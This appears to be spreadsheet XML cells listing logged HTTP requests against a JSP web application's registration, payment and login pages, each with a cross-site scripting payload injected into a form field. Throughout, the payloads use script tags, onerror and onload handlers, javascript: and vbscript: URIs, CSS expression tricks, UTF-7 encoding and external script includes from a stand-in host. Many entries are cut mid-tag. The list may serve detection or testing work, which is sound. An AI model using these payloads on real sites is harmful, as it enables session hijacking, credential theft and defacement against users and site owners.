bb304c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2f85397af2881726c9c19e03299c907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ce7f410ea304396b30da9e95ae20a4f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981ba17f8d35f7df2ae44573531882ef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33636f72d0aa44e1a3ebb7e8c658f50f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01d8f3f6e59b79dfefae0c267b593d5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84c386ea5d7e66d19884318f2a5ef757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1ed4cbbe125d4be594638a018367896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52c23ac60182a6725382a900bd76284b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273750b433d807d366490a89cd5f982d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0fe5c2ab6b2deb1251f9561dff660cab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4cd6ecd3848186b900c22552ac830da0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c70044fc757c2fc42d2852e797992c40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83e5176553fea9883e9590ea0832b7ef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a344180b51137dd735fe8e9600926757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3602fb6689466f49a7da97ed9dd081b8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e0b4916d09e8a55eb3cc77b1e2298a59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eac72b227b1a1cabdd169502ca165f3e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61a117a37a1db6d08e6a6866c24769b5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c7f03e0a0ac59c5567a44905fb96cbb7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b23f0860f02517a80e3753c3d4da82ef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cbfba10e29960e5caaefaf6d3c5c47da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b8f2be9eb1278af5b8a10db2d5c3adf7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9497fffb9f3d7d4ef6153b5f3091127b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7810fbd6443cb298d6368eb08463ed4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f692cd51538d8eefd39f4cc5c87063f3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b4a2424bed07bec4c08617f9d21b1e72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script&gt;alert('312c40a6f6aa22e10d677479db316f40')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bae8180e5794fbc05934d4ae09cf37bd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469aa87d90da68fb3cb3f9106e258598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bd637f801212cc89c39ecdaf077d800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8cf33b030ef13cf8155b78eb792b5161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3e209004d0cae70b16e3474b9cf488dd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79afd9dc983ba33698e74e9b72712b1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def587b8d9a969f5d01221d13b993c9b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91b47c1d0a6b7ef4e312369c097226f2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"""&gt;69235a0278fcc421b52540edef5e496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86a24902f05e074c2097a532e1f02ef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ehaviour:url(76812b9cd93d785aa3fe6bd54ff678af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f9f76744258d65256583469107b240af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8be9772f02439f6759a04a535800144b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a8a29fe31648eed2e2152a03e5fc592c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background="e966177daddd7f8e90bb350db628269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b1e4bbc4ace7f3e84acc25f9054b127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add352b05fb034758dc2104d1c2ddb6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1ac73e681af8aa5891a3d8f9a0e5569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ba28332e31a61cb1d9e3de2d52db115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f2ddff44827e7243edaf9450a95c3c5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47fd9440db635c5c4d22cbc25e3c3afb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inkrel="stylesheet"href="94e98e8405b163f328fcfc6a173a95b8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04379a85ffcbec2f1f8a8762eeabbad2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1817b57fe128c2db70ffbcc17e6d844a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cb56714160d370f2e1612c1d91eb4527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8c45b1b3d0f6314bf893103190a5154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93fee0fa5dd3c5c187b74c734f1c452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f2907f35776eab728fa2bd903c60fe71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20432e85610f9dc75a7e81bd840e5c9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a0e393aaba1422a8a3f0c071bca234f4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4ee4b86dcb21fb96fed7297eea09f0a7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919dddd7e32f15f0be24b59dcc85574a"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06d0ff4d7deeece72a77562d7fe6f24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752bc1eeefb52c01011b30eb8d04776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5b94e36f3aa99d1e1a0c7babb93da812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4729ad182bb6600c69f767c975d67358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03f9ad8c037f8aaed68de9ac4dcbb833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057b1c6f56a69768ec099f97abb5e48b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85a1b59e34683ad2d2c49407f88cfb06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rameset&gt;&lt;framesrc="670a71b53e5f8d46ae9bd601560dc105"&gt;&lt;framese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aa6dc2372d2d2e2438e3e9ee366e02b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714e2954d9693031396e489cc22f184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513c85238cba08db9a6f9c0b880f47d6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f65c1be0bb49c565ebcbdeea7321ebaa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23ef28547a15ca81ccd2e913bdfc0e2c*/ession(23ef28547a15ca81ccd2e913bdfc0e2c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9cf53afdaeb92d0ca4d8e5355a88b04bstyle="xss:expression(9cf53afdaeb92d0ca4d8e5355a88b04b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javascript"&gt;ae15add0aab919744dcab2faaaf9bbc4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.3ff3cef976543ca617a057219837e824{background-image:url("3ff3cef976543ca617a057219837e824");}&lt;style&gt;&lt;aclass=3ff3cef976543ca617a057219837e824&gt;&lt;/a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type="textcss"&gt;body{background:url("e86487e072f6b2252883a523b9218c74")}&lt;/styl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90826903d678ed96a09226bb2b369b83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cd401bf82fdf5628dd3f2a9ea6439462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cce918fcc222bad0c78877517d6cf3bf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d76b034390c8819b9d23d1eaef8b7f1c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3e0d78bea2dcb2616af508f5ab019343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9fef7e02c61a29206a0a4c555eb1ba78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src=http:/127.0.0.1&gt;9a9f5abbb90229f5e2f395425570b0d9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14;javascript:cfef22021316d21479ae985f24a9008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80a6cdb40da50b88c873d08810dddbd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&amp;#14;82fd514daf72dcb20bc67b1c58cd53c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d60f18b38e0de3d25c13ff5a215a4ccd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9f8f259d1c57d1c8709bcc0e2b07ebf5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e2cff9f1ddcddb47160f15a244b247bd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657d6b7dca30a924da2307fb65fa7a7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0e57f32f115d389d3ceaadab4ae2a8c3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d9622f602355cc90a790b67a4e0513d3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2b3aab525ecf10b7fb2d2857b59c82cf/n2b3aab525ecf10b7fb2d2857b59c82cf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aa0e125c114c9f68209454aa64375844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92f32ee4d90b7f4f5eec6565a0de230b&lt;style&gt;&lt;ul&gt;&lt;li&gt;92f32ee4d90b7f4f5eec6565a0de230b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2c69f9173d3caf82b01e8dab5b65c08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1cfa72cf28e59aa06b957cf8f0730510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javascript#4c59a5802b93c7605504db4bc1a64b4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9467e73b04f718fb478250bad7c4710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9bf513498b201eb4e7c5e9a8fe0f4241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29046eab47831d20b538568dc11bb7f3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73cb00848180c8cf5a8c66523142b407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ahref="about:c0235e25ba09163961ab67dc3366fc1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481a0c845ccd7e53a2a8725efc65bde9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9bbe0c740a351cc33cd4dc72efd8abd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482697841299d766e301d376a6256c13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7b108545c607046e95e17e17edb451d4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1979687f938fd440b0bb5eae43a0df5e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e637544d5f76f8c822d63ddec30dd9b0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88bdf7b27d17e55f7437798c908acc54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6c1d1b15c20d222bf38f82c3850442db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formid="test"&gt;&lt;buttonform="test"formaction="javascript:f6cf9cfea0d7a66158896a24dbbe05b4"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1ade3f2e8e18dc4c727f7f5cf96c22e7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6c101e97f2245b3dc126bbfeb49ee88c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extareaonfocus=javascript:c5ca3381f1089a18494c4b28da71d36e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bab232be7445d8daeedaaf1356a2c911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581646d255cabe6ae7cbacd1757d5bbd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bc1b222e1ff18f5dabfd51ec4b3ae411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efb6f3c2f7dd68810e2e48b0321792ac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ced330c32fabdfd4df4b0c5ffc56740f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ea0e042691086105b9a0c5b207e035f7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0a785fd23d4c261db5659e07abc9725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57225937f76b7fc8e14c573ed65f09ad"&gt;&lt;sourc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d36087d001ee4d6bf6f9a847d760b420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bf98052c591da2534bf148101994c81c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itle&gt;bb81f149e29d728523ed3d7dd9d36cf6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&gt;&lt;imgsrc="x:x"onerror="9205c0e39897ee66447330bd9343c589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!#$%&amp;()*~+-_.,:;?@[|\\]^`=647aa7a530d969d1bf6565970db2dc0c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'';!--"&lt;85a17087cbf560fb103caec88ab26b59&gt;=&amp;{()}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eb728ba3f68923f50248fb864d8afa88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`7b08d4fce37069b89b57b4c96775b97b`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&amp;#14;6475a6d12dbea4c4903dcc20aa9d857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&lt;script&gt;175f7085eab4d613d844e2b90bea8bac/&l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";9b5296f64c17a6d56a3e8ac2d18f36f6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8655ed7ac6309aae015ee074cf2caa5e'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src="3b95c8ac39b1b8449f052d4bba911760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load=170131f7aa70797221e48fd15b84faf2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dynsrc="593af700188ff23c7917e190d026571d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lowsrc="4429171819c4c5711f0b1f94852fd673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gsoundsrc="86506254248e11336ee3c7636a3f1ffb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rsize="&amp;{4173c2811ab75e5835d5f039486bea7f}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'vbscript:773f071c9de674bafda1161ab33f47cc'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mocha:[2ceb876bd318114ad27bc2f1c705db26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livescript:[124aef6cda1a1876ae843f059fb1ed32]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refresh"content="0;url=d09b48eacb351b08df1ed491cdaf0dba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76b0ca7c28dd94c999c18baad1453c76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javascript:844e2a17f929d86c8f48a56a3d588325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d5b64aec6c034287bf8edcbc93c5692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187ebfbf697f10b452beae1e1d4d5a65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onload=e552d95a8745447eae5a3297a87bd9c0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7fc11e3763d6be6ee46b2aefd5decc27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//////onload=2ab5d9118f3535847178917bc20bd18e&gt;&lt;/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"onload=b9877060f9da510aea143b49c68666e0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1)?&gt;onload=dcd2d6570a7a1503dd5d2d874c095d16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&lt;?phpechochr(12)?&gt;onload=cacb2a8ade6bc1a76cd349716c56d6c7&gt;&lt;iframe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background="9f9f97424ef1c3090fbb2176a9379c1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table&gt;&lt;tdbackground="1b45d36e64229191c1c1e0028e4cf892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width:expression(31aa48aec9d71a31d49be68ff1e5f421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tyle="xss:expr*794d7a03a066571eb68f489711b79e13*/ession(794d7a03a066571eb68f489711b79e13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62c78d2286fb9717428b95a17bdba295style="xss:expression(62c78d2286fb9717428b95a17bdba295)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[ifgteie4]&gt;917d9d9d6af1abbcda59144c34997b79&lt;![endif]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asehref="489aa28486f4f268e0d2e5dcdb07772b/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ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;paramname=urlvalue=225de1e8409d657a074164fa4658d0e5&gt;&lt;objec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a="get";b="url("";c="javascript:";d="896a9ed0af95873bd4129d320eac65b2")";eval(a+b+c+d)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?echo('&lt;scr)';echo('ipt&gt;fb2bbe3327fc8ce65546b54ecd7e0c66&lt;script&gt;');?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="set-cookie"content="userid=&amp;lt;script&amp;gt;faee3c806ca45f583e8ece6d4a7baabf&amp;lt;script&amp;gt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"jav&amp;#x0d;ascript:04de03a931f76da5d9651fdd00f5a26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&lt;imgsrc="02f4bc3b186553dc478df5587bd82a3c"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102af51f4047a9292872b0a373cffb34/alert(a.source)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---";16e41180e11788cff7570996bb344a2d;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metahttp-equivo"refresh"content="0;url=http:/;url=52cdede5e4f31843d5356b7f4b6ff5df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lt;b&gt;=15120e7c76f1b9f5aa7cde3776aa638e"&gt;&lt;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framesrc="javascript:57c756c8146be5a8aeb0a5fe8bd4b262&l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cript&gt;a=cc0af1fb2e3e7a64e23908e9c300891e/ncc0af1fb2e3e7a64e23908e9c300891e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layersrc="javascript:578426cc947b40819f3c1004c70bf1ce&gt;&lt;layer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li{list-style-image:url("b401b3ecceb8d2ac706ba88e537e5f35&lt;style&gt;&lt;ul&gt;&lt;li&gt;b401b3ecceb8d2ac706ba88e537e5f35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ackground-image:url(&amp;#1;javascript:d25dec40468f71b3139374eaff9a8e64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head&gt;&lt;metahttp-equiv="content-type"content="texthtml;charset=utf-7"&gt;&lt;/head&gt;+adw-script+ad4-cc6e970e881ab8a176acb5994ebdcdf2+adw-/script+ad4-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type="image"dynsrc="2cc7c1f60b3803a5dfd13145b16dc59e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afe114040d965b2ce22fcf6daca3207c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amp;{c027749f6f100e2dc767a0573291f69d}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mgsrc=&amp;{718d32dff551f1cdaa24b0f92b1f36b2};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style="binding:url(javascript:397cc47f34a60e1e6ca320ef138ec311);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objectclassid=clsid:..."codebase="javascript:30498ddac2a675f563985aa9d7b0d8e7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tyle&gt;&lt;!--&lt;style&gt;&lt;script&gt;d51db58b49ab0b6d132899684ca61c5b/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![cdata[&lt;!--]]&lt;script&gt;e60ef53603f5687b16b66bf9a32ffb65/--&gt;&lt;/script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!------&gt;a04d36e3592087f5935a002542a58222&lt;!------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"x"&gt;&lt;a&gt;&lt;b&gt;205125392136866cac9c4407cf13ff91;&lt;b&gt;&lt;a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divdatafld="b"dataformatas="html"datasrc="#790e7b86857488746d1e09404404aae0"&gt;&lt;div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xmlid=i&gt;&lt;x&gt;&lt;c&gt;&lt;![cdata[&lt;imgsrc="javas]]&lt;![cdata[cript:9ebbda7796847447e2e0db4c94274c22"&gt;]]&lt;c&gt;&lt;x&gt;&lt;/xml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focus=javascript:d72772338daaeebb947704635a70cfdb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selectonfocus=javascript:282d0cee2d818c313e81494a15446c17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keygenonfocus=javascript:b8a43baed5dbb4ca5e7887f1cf166c22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inputonblur=javascript:9c7441b557489c9990348b70dfba3696autofocus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poster=javascript:b9720e4e969ab6e10f30ed5f28f90748/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bodyonscroll=467fdf4824d2bafe26bfd8d75b2a4b87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onforminput=javascript:9477dbb8da6cc3ef6292d7b19cf87402&gt;&lt;input&gt;&lt;form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x&lt;formid=test&gt;&lt;input&gt;&lt;form&gt;&lt;buttonform=testonformchange==javascript:51d5935e6a115df514a7c273eb2af04f&gt;x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&gt;&lt;sourceonerror="javascript:9e49b650c68461e047ed40dda0c95265"&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=carlos&amp;apellidos=perez&amp;email=perez@yahoo.com&amp;dni=23453457z&amp;provincia=1&amp;cp=12354&amp;b1=registrar&amp;ciudad=madrid&amp;ntc=1234567890123456&amp;direccion=&lt;videoonerror="javascript:72c3d6611f4356ced2c9abb13b1885ad"&gt;&lt;sourc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"&gt;ee6210ed924bd77bdd4666c5614c8b0b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"&gt;&lt;script&gt;alert('7c69c38f3858626ebb0895f7fffad500')&lt;scrip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'';!--"&lt;2de8ba8f5bb462555c81d14527f37d61&gt;=&amp;{()}"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title&gt;6973999a48253d096b9f674fff6b800f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"&gt;&lt;imgsrc="x:x"onerror="e161646ec30a7f16f1bcc7c62fc9744f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bodyonload!#$%&amp;()*~+-_.,:;?@[|\\]^`=cb49cd88075a8d28c3680fc2b6a0c266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'';!--"&lt;7cb32d87431fbadd37d293556a68244a&gt;=&amp;{()}"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"9b715fd4734c71d26e697241b81ee0af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afd80a28003876e5e9dfdda865493038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`04c63dad7e0bad5cfe558c3be0e9b9de`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"""&gt;d30505a88958977ddeba8e9d8524f571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"&amp;#14;e1fe311f0e60ab643a9a91863a718108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divstyle="behaviour:url(f8b0f0d1a362153fbe16e980a526ea6e);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&lt;script&gt;049867f90500d74c2ba5960db2c038e5/&lt;&lt;/scrip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";7859e5091bd624e9dda073e21ad8091c/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'd46ae9af32930e617b0107e546b2220f'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bodybackground="e0ecf27f736dcef25eb30b6139c48e2f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nputtype="image"src="6820e35552afaa0d1964fd73e222951b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bodyonload=f2d755f273da5e0380366966b099bda7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dynsrc="a19c1691cf8cfa9aace2b988829a6fa2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lowsrc="f0554687bd0e1ad260e140066c4106c3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bgsoundsrc="cd00a3822249d6959d048e9d48e4e5f4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brsize="&amp;{7771a2d9f1cc413e90dc9587a9c6d71d}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linkrel="stylesheet"href="5b1214ffb7675573e4e3c86684aaeafe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'vbscript:35a95a7013c6a327e04deacb963a9811'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"mocha:[568a63e407edf827302265eb129a87c4]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"livescript:[03cde4666027ef0121a6d53b153dca58]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metahttp-equiv="refresh"content="0;url=85ad9470ca6a3b458e42f78f8e628233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tablebackground="9be76d04e6a04b4c11ab633f73676a64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tablebackground=javascript:e743a7087c75fc4ca2f0f8f654c607c6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table&gt;&lt;tdbackground="a0f17d845e11ce993263085f385bcf1f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divstyle="background-image:url(6f3169c789107bb4cce162e40bbe12d7);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divstyle="width:expression(3012c47ec6a23b64512fe6994725e76e);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framesrc="c0464357fab26157ffcc35f8176818c5"&gt;&lt;ifram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frame/onload=6e659bf94eb4f4c7aa0eefb722e405aa&gt;&lt;/ifram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frame"onload=e67d73e8b2a2bcd36b7750817881d1c7&gt;&lt;/ifram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frame//////onload=7d1dcda8aa90acdee59dd5849941d7be&gt;&lt;/ifram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frame"onload=938861605c0095361db338c3ed5b4a55&gt;&lt;ifram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frame"onload=c1128a3c9bf708d9ac9ff1fb69e13bbc&gt;&lt;/ifram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frame&lt;?phpechochr(11)?&gt;onload=c56f379037f6f29f936da672d0fb8c3a&gt;&lt;ifram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frame&lt;?phpechochr(12)?&gt;onload=097e086e8bbe07f17ac7ad5918256c4c&gt;&lt;ifram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frameset&gt;&lt;framesrc="eee5f550ce1b544c38f8279e3cb75c36"&gt;&lt;framese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tablebackground="a1e2bf6d8a13e01ad91aa56ce17f42a8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table&gt;&lt;tdbackground="c6a0bce107dda035c02be28ee8575c99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divstyle="background-image:url(&amp;#1;da3dad52ae4d24e0ce469835fb6898e7)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divstyle="width:expression(d247678dc48c1308886f7cca79cf9b82);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tyle="xss:expr*54783d15c29e3f73ae15f4f905870b34*/ession(54783d15c29e3f73ae15f4f905870b34)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a6def48205003dc20243d48e1223dba0style="xss:expression(a6def48205003dc20243d48e1223dba0)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tyletype="textjavascript"&gt;4c789c67dedc38f622808091775e2613&lt;/styl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tyle&gt;.c44a306c707b9256082a701c957f5fca{background-image:url("c44a306c707b9256082a701c957f5fca");}&lt;style&gt;&lt;aclass=c44a306c707b9256082a701c957f5fca&gt;&lt;/a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tyletype="textcss"&gt;body{background:url("2bb72bbca827fb968e7fb291f88ebc05")}&lt;/style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!--[ifgteie4]&gt;77b4e781775c21fe6a60f6e02bc48739&lt;![endif]--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basehref="a33ab9ae580ac65320dcc8d0e768423a/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objectclassid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;paramname=urlvalue=b95a072b39132e745d2b2635f0821d68&gt;&lt;objec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a="get";b="url("";c="javascript:";d="f1463c09ecb9000f7b2ea585d27f0f9d")";eval(a+b+c+d)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?echo('&lt;scr)';echo('ipt&gt;377141808a3f60cc9fe7c8627edd9bd6&lt;script&gt;');?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metahttp-equiv="set-cookie"content="userid=&amp;lt;script&amp;gt;a264f6d978966b2f19b9780a3110749b&amp;lt;script&amp;gt;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criptsrc=http:/127.0.0.1&gt;ce7f0774adbc439aa831350b667e2e2b&lt;/scrip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"&amp;14;javascript:603b7628e4fd1b58165005f26f906981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"jav&amp;#x0d;ascript:69ee308e6a249457f90b97f012c8fd45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---&lt;imgsrc="&amp;#14;f49582e28f38dbee3aa7d113fedc355f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---&lt;imgsrc="30eeda4daca4a310e2cf7b68cbb788ef"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cript&gt;a=762f26281a91e7c38a7236bbf4231215/alert(a.source)&lt;/scrip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---";47ec5baf086f88bc46ac5c0fe10bc9fd;/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metahttp-equivo"refresh"content="0;url=http:/;url=8b0c53aecf18d906ba626bac5eb050ea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cript&lt;b&gt;=b683c81673665d882f645a3699e4261c"&gt;&lt;scrip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framesrc="javascript:c18c975f41816c17382c662b664aab8d&l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cript&gt;a=773992fddbd26efe2518775d93be23bb/n773992fddbd26efe2518775d93be23bb&lt;/scrip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layersrc="javascript:d11ba0d2d1fa61c1462ec490a9ffeb13&gt;&lt;layer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tyle&gt;li{list-style-image:url("752967ece3fd28488371a8949c0ffbc8&lt;style&gt;&lt;ul&gt;&lt;li&gt;752967ece3fd28488371a8949c0ffbc8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divstyle="background-image:url(&amp;#1;javascript:3fe6d0a0f8c411f7d83eaa774bedf38e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head&gt;&lt;metahttp-equiv="content-type"content="texthtml;charset=utf-7"&gt;&lt;/head&gt;+adw-script+ad4-1732a02c429cda4d1d7ac6033f184f7c+adw-/script+ad4-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ahref="javascript#c94086d90a4642054ce2a6352c74d15d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nputtype="image"dynsrc="6517aa88071dfb840ad7f25781f78d27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amp;e869431eb16993b057f9e03609a67209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amp;{fb608edb6a496585e9007b49bde8f545}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mgsrc=&amp;{c0656ef55bbc896c2b8d490d8cba98fd};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ahref="about:835c599470277f67f32cdf469fa39049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divstyle="binding:url(javascript:73b318501feeaf466289fd510b466925);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objectclassid=clsid:..."codebase="javascript:6f7537e3c82b10b9cd13b9212707ec80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tyle&gt;&lt;!--&lt;style&gt;&lt;script&gt;3fd74e13d1a7e1ee6112f7ee5e9dd61f//--&gt;&lt;/scrip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![cdata[&lt;!--]]&lt;script&gt;843edcca4f4bb2847c1f6fdb8053c9be/--&gt;&lt;/script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!------&gt;f603c96089729ea481738a106d7f7a83&lt;!------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xmlid="x"&gt;&lt;a&gt;&lt;b&gt;1a364911b839dfa5066955d377f0b209;&lt;b&gt;&lt;a&gt;&lt;/xml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divdatafld="b"dataformatas="html"datasrc="#ee68248596014d8731dacbb9bdde0dd0"&gt;&lt;div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xmlid=i&gt;&lt;x&gt;&lt;c&gt;&lt;![cdata[&lt;imgsrc="javas]]&lt;![cdata[cript:6d0d0e8e0e55f51281e966fb2d9bd988"&gt;]]&lt;c&gt;&lt;x&gt;&lt;/xml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formid="test"&gt;&lt;buttonform="test"formaction="javascript:854bfad651717f8b903bebf4cfc91573"&gt;x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nputonfocus=javascript:e36caafc795f44ab5f047f44f2c87760autofocus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selectonfocus=javascript:d1ad4da5db065a172e8720ee0dcb1975autofocus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textareaonfocus=javascript:2017614c3034853643712019456a45d7autofocus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keygenonfocus=javascript:4677c49b764c90637a829eb5b0efcd35autofocus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inputonblur=javascript:252ea08aa3b6591e7cc047930d435585autofocus&gt;&lt;inputautofocus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videoposter=javascript:88a453e9f065446af702f6cd92599332/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bodyonscroll=fb3469aafdc57d79cd408241812df243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br&gt;&lt;inputautofocus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x&lt;formid=testonforminput=javascript:edfb7dd167f0c421e7e3b5915f49f974&gt;&lt;input&gt;&lt;form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x&lt;formid=test&gt;&lt;input&gt;&lt;form&gt;&lt;buttonform=testonformchange==javascript:bc934d1b7028d94ab0ac8e203af08a7b&gt;x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video&gt;&lt;sourceonerror="javascript:6b57379054f3a631e90e7e106ce7a432"&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;apellidos=perez&amp;email=perez@yahoo.com&amp;dni=23453457z&amp;provincia=1&amp;cp=12354&amp;ntc=1234567890123456&amp;b1=registrar&amp;direccion=pez,2&amp;ciudad=madrid&amp;nombre=&lt;videoonerror="javascript:ae6d4dc9e361d68066a3d73f6679a24d"&gt;&lt;source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"&gt;&lt;script&gt;alert('db5b48be789e1bb07a819f278ceb87cf')&lt;script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'';!--"&lt;eb1290d71dc3c0e5c0afffc33febe014&gt;=&amp;{()}"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title&gt;16de4498ac2ec2f9c87384cebcab3e04</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=carlos&amp;apellidos=perez&amp;email=perez@yahoo.com&amp;dni=23453457z&amp;provincia=1&amp;cp=12354&amp;b1=registrar&amp;direccion=pez,2&amp;ciudad=madrid&amp;ntc="&gt;&lt;imgsrc="x:x"onerror="f7ab6f185469df6733e7e8672619c756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bodyonload!#$%&amp;()*~+-_.,:;?@[|\\]^`=33e82a7361881e9495f0ecff22410130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'';!--"&lt;4cacb2650b92597adc53c2f5321da416&gt;=&amp;{()}"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mgsrc="920dd846f64bc3fafa438c5836710ef7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mgsrc="&amp;#14;744fe304b4cca5772fbf144b16d6e042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&lt;script&gt;61f21eaf03ce76ec52de48ddc18285a2/&lt;&lt;/script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bodybackground="cd4457a718c2a68fdffd814eb4ed0df8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nputtype="image"src="73335d15fa4065a05577f7026f8c0af8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bodyonload=50ab01d4bba2875fc8478f6b476f1b33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mgdynsrc="b2f989b30115a55a1299b62e5d4ab2d5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brsize="&amp;{accf2a90d9272b8f42a4cc735f9ca13b}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linkrel="stylesheet"href="a35bb0c4c544d85fc136d2bbcc71adee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mgsrc='vbscript:8f6d0a0b4dbb8b3011980ce32b7d4d6d'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mgsrc="mocha:[d23aef4aaa7b8536e84ea5dd96942f12]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divstyle="background-image:url(4026484bae720034b959675b6e718a60);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divstyle="width:expression(554c0b836857d4032cbae6a2451902a6);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frame/onload=07cf9f6492e4bd1a5b02e0fc846f31e1&gt;&lt;/iframe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frame"onload=5e98d87bbca19f17e1bb01f0ef14a7ef&gt;&lt;/iframe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frame//////onload=d1de6b42b0130a8729ef1cc3d4197b17&gt;&lt;/iframe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frame"onload=7ab10701aae561d46245000710674b8b&gt;&lt;iframe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frame"onload=3bdda27871b8a2a4139be25eae9eb007&gt;&lt;/iframe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frame&lt;?phpechochr(11)?&gt;onload=08a970a10388d5062e47e886266e4bdb&gt;&lt;iframe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frame&lt;?phpechochr(12)?&gt;onload=441e72d54a1096c639ad23ba1b96ca9f&gt;&lt;iframe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frameset&gt;&lt;framesrc="614e3348c898d0fcded9da8ebd8c01a6"&gt;&lt;frameset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divstyle="background-image:url(&amp;#1;8411bee11a663c63347bc2e0f15fec7c)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mgstyle="xss:expr*62d0ba73da07704dc07e4bd8f82c17a8*/ession(62d0ba73da07704dc07e4bd8f82c17a8)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dcda7bc250305a73ec58b7a41c30d0b7style="xss:expression(dcda7bc250305a73ec58b7a41c30d0b7)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styletype="textjavascript"&gt;97b7f42dc491c83445f720962ba983e2&lt;/style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basehref="6005677fb5266c4a9136a06523dee5f6/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objectclassid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;paramname=urlvalue=d42e956b6da5755828c8278443fc208d&gt;&lt;object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?echo('&lt;scr)';echo('ipt&gt;13edd883a4cc8dd24f968fe73c13aae4&lt;script&gt;');?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metahttp-equiv="set-cookie"content="userid=&amp;lt;script&amp;gt;9eaf677bd10c469e37d6d02b410424b4&amp;lt;script&amp;gt;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scriptsrc=http:/127.0.0.1&gt;8cf05f2b733febe570a4b07c74b16315&lt;/script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mgsrc="jav&amp;#x0d;ascript:2b2006809ce4e8519c96357a1f157724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---&lt;imgsrc="&amp;#14;ce3b997fe7454e7c8edd51b3040e5798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metahttp-equivo"refresh"content="0;url=http:/;url=06112b4009a7874a91b2c1fc817e7ca8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script&lt;b&gt;=cf93e3077f18ec43df345ecadb8c0eec"&gt;&lt;script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script&gt;a=76181fdf509bbeb435ebe399ff2dc422/n76181fdf509bbeb435ebe399ff2dc422&lt;/script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layersrc="javascript:93974039590fcfd49ecf0e74910b1025&gt;&lt;layer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style&gt;li{list-style-image:url("2b352d1d16eb737a36b080a3f43fce25&lt;style&gt;&lt;ul&gt;&lt;li&gt;2b352d1d16eb737a36b080a3f43fce25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ahref="javascript#ef6ea583247078b4da786142ec0c49b2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amp;f15878b6584f7d49f228ef42db199ef5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amp;{94333e51d9fdf23ebe8fdd2cfb5dd1cf}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mgsrc=&amp;{2910bf93fd4a98801b426aedf9ed326f};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ahref="about:41ea7a248b7d8bd56705664c6fd3043c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divstyle="binding:url(javascript:eb5e0ade6c539312cfacf8bf848d3d14);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objectclassid=clsid:..."codebase="javascript:ad23c112f628cf0ad94e05f40b5c2378"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![cdata[&lt;!--]]&lt;script&gt;e2e21bb586c7abf832efaace01f889e8/--&gt;&lt;/script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!------&gt;023b36835697d7335754eb1ffd9b0d18&lt;!------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xmlid="x"&gt;&lt;a&gt;&lt;b&gt;2e7333a4b79b203b36e28dde2b8a7e4c;&lt;b&gt;&lt;a&gt;&lt;/xml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divdatafld="b"dataformatas="html"datasrc="#c617516c4885253cbc848e9e6e09ac49"&gt;&lt;div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xmlid=i&gt;&lt;x&gt;&lt;c&gt;&lt;![cdata[&lt;imgsrc="javas]]&lt;![cdata[cript:66f914354285f6a8df9fafd83ec597ff"&gt;]]&lt;c&gt;&lt;x&gt;&lt;/xml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formid="test"&gt;&lt;buttonform="test"formaction="javascript:fa01a99d5a8d62ba54b650a03cf8d5f2"&gt;x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nputonfocus=javascript:46433566e41b8501b4ccbb0d9d9208d7autofocus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selectonfocus=javascript:c7b792e823cfa39e1acef6ac41abc724autofocus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keygenonfocus=javascript:f3912fcc48e7345739dfe61d570f8b01autofocus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inputonblur=javascript:5ac54fce940ceb548998141d404d4149autofocus&gt;&lt;inputautofocus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videoposter=javascript:c99c9221b305ebdf93fd52e98a96111b/</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=carlos&amp;apellidos=perez&amp;email=perez@yahoo.com&amp;dni=23453457z&amp;provincia=1&amp;cp=12354&amp;b1=registrar&amp;direccion=pez,2&amp;ciudad=madrid&amp;ntc=x&lt;formid=testonforminput=javascript:aff1a8087621994ef3125ea411391c0b&gt;&lt;input&gt;&lt;form&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=carlos&amp;apellidos=perez&amp;email=perez@yahoo.com&amp;dni=23453457z&amp;provincia=1&amp;cp=12354&amp;b1=registrar&amp;direccion=pez,2&amp;ciudad=madrid&amp;ntc=&lt;video&gt;&lt;sourceonerror="javascript:0df7c6ad9bb143efec20d77abc72c193"&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio='';!--"&lt;wmpq&gt;=&amp;{()}</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=&lt;script/xss+src=http://wmpq/x.js&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=&lt;script+src=http://wmpq/x.js&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=&lt;script&gt;fake_alert("wmpq")&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=&lt;_x0000_script&gt;fake_alert("wmpq")&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=&lt;script&gt;fake_alert(string.fromcharcode(wmpq))&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=&lt;script/src=http://wmpq/x.js&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=&lt;script&gt;a=/wmpq/fake_alert(a.source)&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=&lt;script&gt;fake_alert("qx8j")&lt;/script&gt;&amp;remember=&amp;pwd=frame30.&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=&lt;script&gt;fake_alert(string.fromcharcode(qx8j))&lt;/script&gt;&amp;remember=&amp;pwd=frame30.&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=&lt;script/xss+src=http://qx8j/x.js&gt;&lt;/script&gt;&amp;remember=&amp;pwd=frame30.&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=&lt;script/src=http://qx8j/x.js&gt;&lt;/script&gt;&amp;remember=&amp;pwd=frame30.&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;modo=entrar&amp;pwd=cv1af&amp;remember=</t>
  </si>
  <si>
